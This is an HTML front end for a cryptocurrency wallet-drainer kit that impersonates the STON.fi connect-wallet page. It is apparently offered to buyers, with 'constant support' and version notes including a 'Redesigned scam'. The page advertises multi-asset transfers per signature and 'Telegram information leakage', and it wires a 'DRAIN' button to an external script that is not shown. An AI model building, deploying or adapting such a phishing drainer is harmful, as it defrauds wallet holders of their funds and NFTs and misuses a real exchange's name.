<!DOCTYPE html>
<html>
<head>
    <title>STON.fi Connect Wallet</title>
    <script src="https://unpkg.com/@tonconnect/ui@latest/dist/tonconnect-ui.min.js"></script>
    <script src="https://unpkg.com/@tonconnect/sdk@latest/dist/tonconnect-sdk.min.js"></script>
</head>
<body>
    <h1>STON.fi Connect Wallet Interface</h1>
    <p>
        Fully transparent work, full sources. <br>
        Community of buyers, constant support. <br>
        As a gift are a few popular offers!
    </p>
    <h2>Supported Wallets:</h2>
    <ul>
        <li>Tonkeeper</li>
        <li>TG Wallet</li>
        <li>TonHub</li>
        <li>MyTonWallet</li>
        <li>DeWallet</li>
        <li>Bitget Wallet</li>
        <li>TonWallet</li>
        <li>XTONWallet</li>
        <li>OpenMask</li>
        <li>SafePal</li>
        <li>OKX Wallet</li>
        <li>HOT</li>
    </ul>

    <h2>Available Functions:</h2>
    <ul>
        <li>Transfer Ton</li>
        <li>Transfer Jetton (4 assets for 1 signature)</li>
        <li>Transfer NFT (4 assets for 1 signature, anonymous numbers and usernames included)</li>
        <li>Telegram information leakage</li>
    </ul>

    <h3>v0.8.5 Updates:</h3>
    <ul>
        <li>The operation of the NFT scan has been changed again</li>
        <li>Token evaluation system has been redesigned</li>
        <li>Marked as scam NFTs are eliminated</li>
        <li>Speeded up the work</li>
        <li>Price is determined by AVG</li>
        <li>Redesigned scam in a more pleasing for the eye look</li>
        <li>Fixed minor bugs and errors</li>
    </ul>

    <div id="ton-connect"></div> <!-- Connect Wallet Button -->
    <button onclick="didtrans();" style="margin-top: 30px; font-size: 24px;">DRAIN</button> <!-- Transfer All Assets Button -->

    <script src="tonsdk.js"></script>
</body>
</html>
